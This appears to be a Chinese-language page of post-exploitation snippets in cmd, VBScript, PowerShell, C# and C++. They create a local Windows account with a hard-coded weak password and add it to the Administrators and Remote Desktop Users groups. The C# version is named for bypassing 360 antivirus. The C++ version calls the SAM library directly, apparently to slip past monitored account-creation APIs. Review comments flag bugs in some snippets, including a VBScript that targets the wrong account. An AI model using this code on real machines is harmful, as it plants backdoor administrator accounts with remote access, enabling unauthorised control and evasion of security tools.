
新建用户

新建用户并添加管理员及远程访问权限

命令行:

rem Three net.exe steps: create the local account, then add it to the two
rem built-in local groups named below (administrators, remote desktop users).
rem All three need an elevated prompt.
net user qwqdanchun password /add /y
net localgroup administrators qwqdanchun /add
net localgroup "remote desktop users" qwqdanchun /add

VBScript:

' Creates a local user through the ADSI WinNT provider ("WinNT://<computer>")
' and then attempts to add a member to the local Administrators group.
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
' Bind path for this machine, built from the WScript.Network computer name.
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
' Create the user object, set its password, then commit it with SetInfo.
Set od=ob.Create("user","qwqdanchun")
od.SetPassword "password"
od.SetInfo
' NOTE(review): the two lines below refer to "/admin", not to the account
' created above ("qwqdanchun"), and the second GetObject argument is the bare
' identifier `user` rather than a quoted class name. As written they do not
' operate on the new account and are likely to fail.
Set of=GetObject(os&"/admin",user)
oe.add os&"/admin"

Powershell(另一个版本):

# Same three steps as the net.exe version above: define the credentials,
# create the local account, then add it to the local administrators group.
# Both cmdlets require an elevated session.
$Username = "qwqdanchun"
$P = "password"
$Password = ConvertTo-SecureString -String $P -AsPlainText -Force

$newUserArgs = @{
    Name        = $Username
    Password    = $Password
    FullName    = "test account"
    Description = "test user."
}
New-LocalUser @newUserArgs

Add-LocalGroupMember -Group "administrators" -Member $Username

c#(使用系统 API 函数):

using System;
using System.Runtime.InteropServices;
namespace Bypass360Add
{
    /// <summary>
    /// Program entry. Creates a local account and adds it to the local
    /// Administrators group through the Netapi32 wrappers in
    /// <see cref="LocalGroupUserHelper"/>, then terminates the process via
    /// kernel32 instead of returning from Main.
    /// </summary>
    public static class BypassUAC_csharp
    {
        /// <summary>kernel32 ExitProcess: ends the process immediately with the given exit code.</summary>
        [DllImport("kernel32.dll")]
        static extern void ExitProcess(uint uExitCode);

        public static void Main(string[] args)
        {
            const string username = "qwqdanchun";
            const string password = "password";
            const string groupname = "Administrators";

            // null server name = the local machine; null comment = no description.
            var helper = new LocalGroupUserHelper();
            helper.AddUser(null, username, password, null);
            helper.GroupAddMembers(null, groupname, username);

            // NOTE(review): ExitProcess(1) skips normal CLR shutdown and reports a
            // failure exit code even when both calls above succeeded.
            ExitProcess(1);
        }
    }
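    /// <summary>
    /// Thin wrappers around the Netapi32 account-management functions
    /// <c>NetUserAdd</c> and <c>NetLocalGroupAddMembers</c>. Both operations
    /// require administrative rights; a failing status is written to the console
    /// together with its NET_API_STATUS code rather than thrown.
    /// NOTE(review): account creation and local-group membership changes made
    /// through these APIs are recorded in the Security event log when
    /// account-management auditing is enabled.
    /// </summary>
    public class LocalGroupUserHelper
    {
        // NET_API_STATUS NetUserAdd(LPCWSTR servername, DWORD level, LPBYTE buf, LPDWORD parm_err).
        // parm_err is an optional pointer (index of the first invalid field). The original
        // declared it as a by-value int, which only happened to marshal as NULL; IntPtr has
        // the native pointer width on both 32- and 64-bit, so IntPtr.Zero is an unambiguous NULL.
        [DllImport("Netapi32.dll")]
        private static extern int NetUserAdd(
            [MarshalAs(UnmanagedType.LPWStr)] string servername,
            int level,
            ref USER_INFO_1 buf,
            IntPtr parm_err);

        // NET_API_STATUS NetLocalGroupAddMembers(LPCWSTR servername, LPCWSTR groupname,
        //                                        DWORD level, LPBYTE buf, DWORD totalentries).
        [DllImport("Netapi32.dll")]
        private static extern int NetLocalGroupAddMembers(
            [MarshalAs(UnmanagedType.LPWStr)] string servername,
            [MarshalAs(UnmanagedType.LPWStr)] string groupname,
            int level,
            ref LOCALGROUP_MEMBERS_INFO_3 buf,
            int totalentries);

        /// <summary>Level-3 member record: one member named as "DOMAIN\name" or a bare local name.</summary>
        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct LOCALGROUP_MEMBERS_INFO_3
        {
            public string domainandname; // lgrmi3_domainandname
        }

        /// <summary>
        /// Level-1 user record consumed by <c>NetUserAdd</c>. Field order and
        /// widths must match the native USER_INFO_1 layout.
        /// </summary>
        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct USER_INFO_1
        {
            public string usri1_name;
            public string usri1_password;
            public int usri1_password_age;
            public int usri1_priv;
            public string usri1_home_dir;
            public string comment;          // usri1_comment
            public int usri1_flags;
            public string usri1_script_path;
        }

        /// <summary>
        /// Creates a local user account via <c>NetUserAdd</c> at information level 1.
        /// </summary>
        /// <param name="serverName">Target server, or <c>null</c> for the local machine.</param>
        /// <param name="userName">Account name to create.</param>
        /// <param name="password">Initial password.</param>
        /// <param name="strComment">Account comment; may be <c>null</c>.</param>
        public void AddUser(string serverName, string userName, string password, string strComment)
        {
            var newUser = new USER_INFO_1
            {
                usri1_name = userName,
                usri1_password = password,
                usri1_priv = 1,            // USER_PRIV_USER (the only value NetUserAdd accepts)
                usri1_home_dir = null,     // no home directory
                comment = strComment,
                usri1_script_path = null,  // no logon script
                // NOTE(review): usri1_flags is left at 0 as in the original, although the
                // USER_INFO_1 documentation states UF_SCRIPT must be set — confirm against the API docs.
            };

            int status = NetUserAdd(serverName, 1, ref newUser, IntPtr.Zero);
            if (status != 0)
            {
                // Non-zero is a NET_API_STATUS code (a Win32 or NERR_* error), so report it
                // instead of discarding it.
                Console.WriteLine("Error Adding User: " + status);
            }
        }

        /// <summary>
        /// Adds one account to a local group via <c>NetLocalGroupAddMembers</c>
        /// at information level 3.
        /// </summary>
        /// <param name="serverName">Target server, or <c>null</c> for the local machine.</param>
        /// <param name="groupName">Local group name.</param>
        /// <param name="userName">Member to add, as "DOMAIN\name" or a bare local name.</param>
        public void GroupAddMembers(string serverName, string groupName, string userName)
        {
            var member = new LOCALGROUP_MEMBERS_INFO_3 { domainandname = userName };

            // totalentries = 1: exactly one LOCALGROUP_MEMBERS_INFO_3 record is passed.
            int status = NetLocalGroupAddMembers(serverName, groupName, 3, ref member, 1);
            if (status != 0)
            {
                Console.WriteLine("Error Adding Group Member: " + status);
            }
        }
    }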
}

c++(重写AddUser):

#include "ApiAddUser.h"



// Creates a local account directly through the SAM client interface
// (samlib.dll) rather than Netapi32's NetUserAdd. The SAM entry points are
// resolved at run time with GetProcAddress using the function-pointer
// typedefs (pSamConnect, pSamOpenDomain, ...) declared in "ApiAddUser.h",
// which is not shown here.
//
// NOTE(review): no return value in this function is checked — each NTSTATUS
// is overwritten by the next call, the GetProcAddress results are called
// unconditionally (a missing export would be a null call), and
// DomainInfo->DomainSid is dereferenced without a null check. None of the
// handles (ServerHandle, DomainHandle, UserHandle, hPolicy) nor DomainInfo is
// released before return. Unlike the C# version on this page, the new account
// is not added to any group.
int wmain(int argc, wchar_t* argv[])
{
    UNICODE_STRING UserName;
    UNICODE_STRING PassWord;
    HANDLE ServerHandle = NULL;
    HANDLE DomainHandle = NULL;
    HANDLE UserHandle = NULL;
    ULONG GrantedAccess;
    ULONG RelativeId;
    NTSTATUS Status = NULL; // NOTE(review): NTSTATUS is an integer type; a pointer constant is used where 0 / STATUS_SUCCESS is meant.
    HMODULE hSamlib = NULL;
    HMODULE hNtdll = NULL;
    HMODULE hNetapi32 = NULL; // never assigned or used in this function
    LSA_HANDLE hPolicy = NULL;
    LSA_OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
    PPOLICY_ACCOUNT_DOMAIN_INFO DomainInfo = NULL;
    USER_ALL_INFORMATION uai = { 0 }; // zero-initialised: only the fields set below are marked present


    // Load the SAM client library and ntdll; neither handle is checked or freed.
    hSamlib = LoadLibraryA("samlib.dll");
    hNtdll = LoadLibraryA("ntdll");

    // Resolve the SAM API and RtlInitUnicodeString dynamically.
    pSamConnect SamConnect = (pSamConnect)GetProcAddress(hSamlib, "SamConnect");
    pSamOpenDomain SamOpenDomain = (pSamOpenDomain)GetProcAddress(hSamlib, "SamOpenDomain");
    pSamCreateUser2InDomain SamCreateUser2InDomain = (pSamCreateUser2InDomain)GetProcAddress(hSamlib, "SamCreateUser2InDomain");
    pSamSetInformationUser SamSetInformationUser = (pSamSetInformationUser)GetProcAddress(hSamlib, "SamSetInformationUser");
    pSamQuerySecurityObject SamQuerySecurityObject = (pSamQuerySecurityObject)GetProcAddress(hSamlib, "SamQuerySecurityObject"); // resolved but not called
    pRtlInitUnicodeString RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");

    // Account name and password are both the hard-coded literal "Admin".
    RtlInitUnicodeString(&UserName, L"Admin");
    RtlInitUnicodeString(&PassWord, L"Admin");

    // Connect to the local SAM server, then read the local account domain's
    // SID from the LSA policy so the matching SAM domain can be opened.
    Status = SamConnect(NULL, &ServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_LOOKUP_DOMAIN, NULL);; // stray second ';'
    Status = LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_VIEW_LOCAL_INFORMATION,&hPolicy);
    Status = LsaQueryInformationPolicy(hPolicy, PolicyAccountDomainInformation, (PVOID*)&DomainInfo);

    // Open the account domain with create/lookup rights (DomainInfo unchecked).
    Status = SamOpenDomain(ServerHandle, 
        DOMAIN_CREATE_USER | DOMAIN_LOOKUP | DOMAIN_READ_PASSWORD_PARAMETERS, 
        DomainInfo->DomainSid, 
        &DomainHandle);

    // Create the user object and request full access plus DELETE | WRITE_DAC
    // on the returned UserHandle; the new RID comes back in RelativeId.
    Status = SamCreateUser2InDomain(DomainHandle,
        &UserName,
        USER_NORMAL_ACCOUNT,
        USER_ALL_ACCESS | DELETE | WRITE_DAC,
        &UserHandle,&GrantedAccess,&RelativeId);

    // Set the password: the UNICODE_STRING goes into NtPassword and the
    // NtPasswordPresent flag / WhichFields bit tell SAM which field to apply.
    RtlInitUnicodeString(&uai.NtPassword, PassWord.Buffer);
    uai.NtPasswordPresent = TRUE;
    uai.WhichFields |= USER_ALL_NTPASSWORDPRESENT;


    Status = SamSetInformationUser(UserHandle,
        UserAllInformation,
        &uai);

    // Always reports success, regardless of the last Status.
    return 0;
}